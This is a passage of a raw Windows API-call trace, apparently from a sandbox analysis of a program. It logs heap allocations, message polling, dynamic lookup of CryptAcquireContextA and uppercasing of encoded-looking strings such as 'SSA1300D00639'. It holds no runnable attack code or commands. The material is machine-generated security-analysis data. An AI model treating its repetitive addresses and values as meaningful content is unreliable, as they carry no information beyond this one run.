dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0252.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0252.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.944] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0252.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0252.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0252.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.945] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3500 | out: hHeap=0x25c0000) returned 1 [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.945] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0252.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.948] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.948] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.948] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0252.948] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.949] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0252.949] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.949] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.949] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.949] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.949] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.949] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.950] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.950] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.950] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.950] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.950] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.950] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.950] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.950] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.951] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.951] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.951] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0252.951] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.951] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0252.951] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.952] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.952] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.953] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.953] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.953] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.953] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.953] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.953] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.953] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.954] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.954] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.954] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.954] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.954] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.954] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.954] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.955] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.955] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.955] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.955] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.955] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.955] CharUpperBuffW (in: 